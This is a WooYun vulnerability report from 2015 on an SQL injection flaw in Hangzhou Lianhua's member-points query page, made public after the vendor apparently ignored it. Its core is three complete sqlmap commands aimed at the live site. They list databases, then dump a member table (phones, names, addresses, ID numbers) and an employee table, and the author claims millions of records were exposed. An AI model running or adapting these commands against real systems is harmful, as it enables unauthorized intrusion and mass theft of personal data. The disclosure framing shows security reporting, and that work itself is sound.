当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117225

漏洞标题:杭州联华某站SQL注入漏洞(1.9万名员工信息、460万会员手机号、住址、身份证等信息泄露)

相关厂商:杭州联华华商集团

漏洞作者: blackchef

提交时间:2015-05-31 09:15

修复时间:2015-07-15 09:16

公开时间:2015-07-15 09:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-31: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

杭州联华华商集团有限公司是一家由联华超市股份有限公司、杭州市商贸旅游集团有限公司和宁波联合集团股份有限公司参股的有限责任公司。公司注册资本金1.205亿元,现有员工1.8万余人。。。
集团公司啊,会给个雷吗?

详细说明:

主站为:http://www.zjlianhua.com/
会员积分查询系统
http://active.lhgw.com.cn/Public/MembPoints.aspx
数据库信息

python sqlmap.py -u "http://active.lhgw.com.cn/Public/MembPoints.aspx" --data "__VIEWSTATE=%2FwEPDwUKMTcyNzk1ODc1OGRkRv1%2FjBtuZdUw2KWr%2Fz3M9LRE492JwAkl4%2FYNv9isnYk%3D&__EVENTVALIDATION=%2FwEWBQK2kKKkBAKsyrLrBgLp9sfWAQKsyvbZDAKW5eX8DQpKo5myiQ596ofWkk4cOJuuNBRJ%2FER8t86wz7z5DifO&textbox1=1003378198&StoredSelect=%E6%9F%A5++%E8%AF%A2" -p textbox1 --dbs

lianhua.png


会员信息

python sqlmap.py -u "http://active.lhgw.com.cn/Public/MembPoints.aspx" --data "__VIEWSTATE=%2FwEPDwUKMTcyNzk1ODc1OGRkRv1%2FjBtuZdUw2KWr%2Fz3M9LRE492JwAkl4%2FYNv9isnYk%3D&__EVENTVALIDATION=%2FwEWBQK2kKKkBAKsyrLrBgLp9sfWAQKsyvbZDAKW5eX8DQpKo5myiQ596ofWkk4cOJuuNBRJ%2FER8t86wz7z5DifO&textbox1=1003378198&StoredSelect=%E6%9F%A5++%E8%AF%A2" -p textbox1 -D Norman -T MC_MemberCard_Info -C '卡号,手机,姓名,详细地址,身份证号' --dump --time-sec 60 --tamper space2randomblank.py

lianhua2.png

员工信息

python sqlmap.py -u "http://active.lhgw.com.cn/Public/MembPoints.aspx" --data "__VIEWSTATE=%2FwEPDwUKMTcyNzk1ODc1OGRkRv1%2FjBtuZdUw2KWr%2Fz3M9LRE492JwAkl4%2FYNv9isnYk%3D&__EVENTVALIDATION=%2FwEWBQK2kKKkBAKsyrLrBgLp9sfWAQKsyvbZDAKW5eX8DQpKo5myiQ596ofWkk4cOJuuNBRJ%2FER8t86wz7z5DifO&textbox1=1003378198&StoredSelect=%E6%9F%A5++%E8%AF%A2" -p textbox1 -D Norman -T 在职人员 --dump --time-sec 60 --tamper space2randomblank.py

lianhua6.png

漏洞证明:

其实不止会员信息,还有这600多张表,也是醉了。。。

lianghua3.png

会员卡信息

lianhua4.png

员工信息

lianhua5.png

修复方案:

。。。

版权声明:转载请注明来源 blackchef@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)